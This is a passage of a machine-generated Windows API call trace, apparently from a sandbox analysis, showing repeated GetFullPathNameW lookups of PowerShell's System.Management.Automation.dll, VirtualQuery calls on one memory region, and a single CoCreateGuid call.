lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.333] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.335] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.336] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.337] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.338] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.339] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.339] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.339] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.340] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.340] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.340] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.340] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.342] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.342] VirtualQuery (in: lpAddress=0x1ab440, lpBuffer=0x1ac300, dwLength=0x30 | out: lpBuffer=0x1ac300*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.342] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.343] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.343] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.344] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.344] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xd18121d4, Data2=0xeaac, Data3=0x4760, Data4=([0]=0xaf, [1]=0x40, [2]=0xa8, [3]=0x41, [4]=0xe, [5]=0x23, [6]=0x5e, [7]=0xa0))) returned 0x0 [0103.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.348] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.348] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.361] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.362] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.362] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.363] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.363] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.363] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.363] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.363] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.364] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.364] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.364] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.366] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, 